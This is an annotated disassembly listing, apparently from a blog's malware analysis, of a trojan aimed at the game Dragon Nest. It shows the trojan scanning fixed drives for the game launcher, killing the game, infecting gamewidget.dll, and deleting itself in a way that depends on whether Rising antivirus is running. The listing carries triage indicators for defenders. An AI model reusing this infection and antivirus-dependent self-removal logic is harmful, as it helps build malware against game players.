00401597 |. 50 push eax ; |ExistingName                   ; its own image
00401598 |. FF15 4C104000 call dword ptr [<&KERNEL32.MoveFileA>>; MoveFileA ; result not checked
0040159E |. 6A 04 push 4 ; /(author: move itself to C:\Recycled\4273328.tmp) 4 = MOVEFILE_DELAY_UNTIL_REBOOT
004015A0 |. 8D85 F8FDFFFF lea eax, dword ptr [ebp-208] ; |
004015A6 |. 6A 00 push 0 ; |NewName = NULL                ; NULL target = delete at next boot
004015A8 |. 50 push eax ; |ExistingName
004015A9 |. FF15 14104000 call dword ptr [<&KERNEL32.MoveFileEx>; MoveFileExA
感染安装龙之谷的所有磁盘
[sourcecode]
;-----------------------------------------------------------------------
; Entry routine, part 3: drive scan loop (004018F7..004019B1) and exit.
; For each drive name in the GetLogicalDriveStringsA list at 0040281C
; (esi walks the double-NUL-terminated list with lstrlenA), if
; GetDriveTypeA == 3 (DRIVE_FIXED) it calls dbghelp!SearchTreeForFile
; to search the whole drive for "dnlauncher.exe"; on a hit it derives
; the game path (00401244), kills the game process (00401224), infects
; gamewidget.dll (00401345) and sets edi = 1. If no drive produced a
; hit (edi == 0) it sleeps 180000 ms (3 min) and rescans forever.
; After a successful pass it frees the payload buffer [402920]; then,
; if RavMonD.exe (ebp, set at 004018E2) is not running it calls
; 004014E8 (the move-self-to-recycle-bin path, per the author),
; otherwise it only schedules its own deletion at reboot via
; MoveFileExA(own path, NULL, MOVEFILE_DELAY_UNTIL_REBOOT); then exit(0).
; Triage notes: an import of dbghelp!SearchTreeForFile is unusual for a
; non-debugger executable and is a cheap static indicator; the
; whole-drive search repeated every 3 minutes shows up as periodic
; heavy disk I/O from this process. Backslashes in the OllyDbg ASCII
; comments (e.g. "A:") appear to have been stripped by the blog.
;-----------------------------------------------------------------------
004018F7 |> 6A 40 /push 40                                ; outer loop: one full pass over all drives
004018F9 |. |33C0 |xor eax, eax
004018FB |. |59 |pop ecx
004018FC |. |8DBC24 350100>|lea edi, dword ptr [esp+135]  ; zero a 260-byte buffer at [esp+134]
00401903 |. |889C24 340100>|mov byte ptr [esp+134], bl
0040190A |. |BE 1C284000 |mov esi, 0040281C ; ASCII “A:”   ; esi = first entry of the drive list
0040190F |. |F3:AB |rep stos dword ptr es:[edi]
00401911 |. |66:AB |stos word ptr es:[edi]
00401913 |. |AA |stos byte ptr es:[edi]
00401914 |. |33FF |xor edi, edi                           ; edi = "infected something this pass" flag
00401916 |. |381D 1C284000 |cmp byte ptr [40281C], bl     ; empty drive list?
0040191C |. |0F84 84000000 |je 004019A6                   ; -> sleep and retry
00401922 |> |56 |/push esi ; /RootPathName                ; inner loop: per drive
00401923 |. |FF15 38104000 ||call dword ptr [<&KERNEL32.GetDrive>; GetDriveTypeA
00401929 |. |83F8 03 ||cmp eax, 3 ; (author: get the drive type) 3 = DRIVE_FIXED
0040192C |. |75 63 ||jnz short 00401991 ; (author: check whether it is a fixed disk) - removable/network drives skipped
0040192E |. |8D8424 340100>||lea eax, dword ptr [esp+134] ; (author: if so, proceed) ; output buffer for the found path
00401935 |. |50 ||push eax
00401936 |. |68 C8104000 ||push 004010C8 ; ASCII “dnlauncher.exe”
0040193B |. |56 ||push esi                                ; search root = this drive
0040193C |. |FF15 BC104000 ||call dword ptr [<&dbghelp.SearchTre>; dbghelp.SearchTreeForFile ; recursive whole-drive search
00401942 |. |85C0 ||test eax, eax ; (author: check whether dnlauncher.exe exists)
00401944 |. |74 4B ||je short 00401991                    ; not on this drive -> next drive
00401946 |. |6A 40 ||push 40                              ; zero a second 260-byte buffer at [esp+238]
00401948 |. |33C0 ||xor eax, eax
0040194A |. |59 ||pop ecx
0040194B |. |8DBC24 390200>||lea edi, dword ptr [esp+239]
00401952 |. |889C24 380200>||mov byte ptr [esp+238], bl
00401959 |. |53 ||push ebx
0040195A |. |F3:AB ||rep stos dword ptr es:[edi]
0040195C |. |66:AB ||stos word ptr es:[edi]
0040195E |. |AA ||stos byte ptr es:[edi]
0040195F |. |8D8424 3C0200>||lea eax, dword ptr [esp+23C]
00401966 |. |50 ||push eax
00401967 |. |8D8424 3C0100>||lea eax, dword ptr [esp+13C] ; the dnlauncher.exe path found above
0040196E |. |50 ||push eax
0040196F |. |E8 D0F8FFFF ||call 00401244 ; (author: get the path of dnlauncher.exe)
00401974 |. |E8 ABF8FFFF ||call 00401224 ; (author: terminate the process) - OpenProcess/TerminateProcess routine, see 0040122F above
00401979 |. |8D8424 440200>||lea eax, dword ptr [esp+244]
00401980 |. |68 E8104000 ||push 004010E8 ; ASCII “gamewidget.dll”
00401985 |. |50 ||push eax
00401986 |. |E8 BAF9FFFF ||call 00401345 ; (author: infect again) - the gamewidget.dll replacement routine
0040198B |. |83C4 14 ||add esp, 14                        ; pops the 5 dwords pushed since 00401959 (cdecl callees)
0040198E |. |6A 01 ||push 1
00401990 |. |5F ||pop edi                                 ; edi = 1: a target was infected this pass
00401991 |> |56 ||push esi ; /String                      ; advance to the next drive string
00401992 |. |FF15 34104000 ||call dword ptr [<&KERNEL32.lstrlenA>; lstrlenA
00401998 |. |385C06 01 ||cmp byte ptr [esi+eax+1], bl     ; next string empty = end of list
0040199C |. |8D7406 01 ||lea esi, dword ptr [esi+eax+1]   ; esi = next string (flags preserved by lea)
004019A0 |.^|75 80 |jnz short 00401922
004019A2 |. |3BFB |cmp edi, ebx                           ; anything infected?
004019A4 |. |75 10 |jnz short 004019B6
004019A6 |> |68 20BF0200 |push 2BF20 ; /Timeout = 180000. ms ; nothing found: wait 3 minutes and rescan
004019AB |. |FF15 44104000 |call dword ptr [<&KERNEL32.Sleep>] ; Sleep
004019B1 |.^E9 41FFFFFF jmp 004018F7                       ; no exit from this loop until a target is infected
004019B6 |> FF35 20294000 push dword ptr [402920]          ; free the payload buffer allocated at 0040189A
004019BC |. E8 4D000000 call <jmp.&MSVCRT.operator delete>
004019C1 |. 55 push ebp                                   ; ebp = "RavMonD.exe" (set at 004018E2)
004019C2 |. E8 F9F7FFFF call 004011C0                     ; find_process
004019C7 |. 59 pop ecx
004019C8 |. 85C0 test eax, eax                            ; PID != 0 -> Rising AV is running
004019CA |. 59 pop ecx
004019CB |. 75 07 jnz short 004019D4
004019CD |. E8 16FBFFFF call 004014E8                     ; AV absent: move self into RECYCLER (author's note)
004019D2 |. EB 0E jmp short 004019E2
004019D4 |> 6A 04 push 4 ; /Flags = DELAY_UNTIL_REBOOT    ; AV present: only self-delete at next boot
004019D6 |. 8D4424 34 lea eax, dword ptr [esp+34] ; |     ; own path (same buffer filled at 00401821)
004019DA |. 53 push ebx ; |NewName                        ; NULL -> delete
004019DB |. 50 push eax ; |ExistingName
004019DC |. FF15 14104000 call dword ptr [<&KERNEL32.MoveFileEx>; MoveFileExA
004019E2 |> 53 push ebx ; /(author: move itself to the recycle bin) ; exit code 0
004019E3 |. FF15 7C104000 call dword ptr [<&MSVCRT.exit>] ; exit
004019E9 |. CC int3 ; (author: exit)                      ; never reached
[/sourcecode]